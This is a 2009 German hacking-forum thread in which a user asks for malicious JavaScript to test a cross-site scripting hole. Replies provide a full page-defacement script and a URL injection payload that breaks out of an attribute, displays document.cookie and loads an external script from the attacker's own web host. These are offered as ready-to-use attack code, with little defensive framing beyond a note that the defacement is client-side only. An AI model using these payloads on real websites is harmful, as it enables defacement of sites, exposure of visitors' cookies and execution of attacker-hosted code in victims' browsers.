Schadhaftes Javascript

Druckbare Version

16.07.2009, 08:37
Brainfuck ++

Schadhaftes Javascript

Hey Leute,

ich brauche einen kleinen JS Virus zum Testen von einem XSS.
Wer hätte da eins ?

Lieben Gruß
17.07.2009, 12:51
-=Player=-

die frage ist jetzt nur, was du unter "schadhaft" oder "virus" verstehst.
die meisten javascript schadcodes sind oft nur würmer, die sich auf der oder anderen homepages verbreiten. (die werden aber meistens speziell für einen angeriff geschrieben)
also solltest du schon etwas genauer beschreiben was du willst.

p.s. um eine xss zu testen brauch man kein Virus
<script>alert(1337)</script>
reicht auch aus ;)
17.07.2009, 12:56
kalachnikov

Was soll denn dein JS Virus anrichten?
Bitte um detailiertes Anliegen.
19.07.2009, 11:23
Brainfuck ++

das mit dem alert hab ich schon gemacht ... ;-) das funktioniert ... :)

genauere angaben kann ich leider nicht geben, weil ich nicht weiss wie sehr ich mit js irgendwas am browser usw. manipulieren kann...was ist denn möglich ?
19.07.2009, 11:58
kalachnikov

du kannst mittels javascript eine page defacen, wenn du das meinst..
hier das Javascript:

Code:

var title = "XSSED BY kalachnikov";var bgcolor = "#000000";var image_url = "suchs dir aus!";var text = "XSS By kalachnikov";var font_color = "#00FF00";deface(title, bgcolor, image_url, text, font_color); function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) { document.title = pageTitle; document.body.innerHTML = ''; document.bgColor = bgColor; var overLay = document.createElement("div"); overLay.style.textAlign = 'center'; document.body.appendChild(overLay); var txt = document.createElement("p"); txt.style.font = 'normal normal bold 30px Verdana'; txt.style.color = fontColor; txt.innerHTML = pageText; overLay.appendChild(txt); if (image_url != "") { var newImg = document.createElement("img");var centerImg = document.createElement("center"); newImg.setAttribute("border", '0'); newImg.setAttribute("src", imageUrl); centerImg.appendChild(newImg); overLay.appendChild(centerImg); } var footer = document.createElement("p"); footer.style.font ='italic normal normal 12px Arial'; footer.style.color = '#333333'; footer.innerHTML = title; overLay.appendChild(footer);}

und das fügst du in die Url ein:

Code:

">/kalachnikov/><script>alert(document.cookie)</script><script src=http://deinePage.de/style.js></script>

damit kannst du eine page "manipulieren" jedoch nicht schädigen..
26.07.2009, 14:25
-=Player=-

das mit dem deface ist nicht ganz richtig, der deface erscheint nur clientseitig und nicht server seitig.
26.07.2009, 19:58
kalachnikov

ja, hast natürlich recht! habs vergessen zu erwähnen...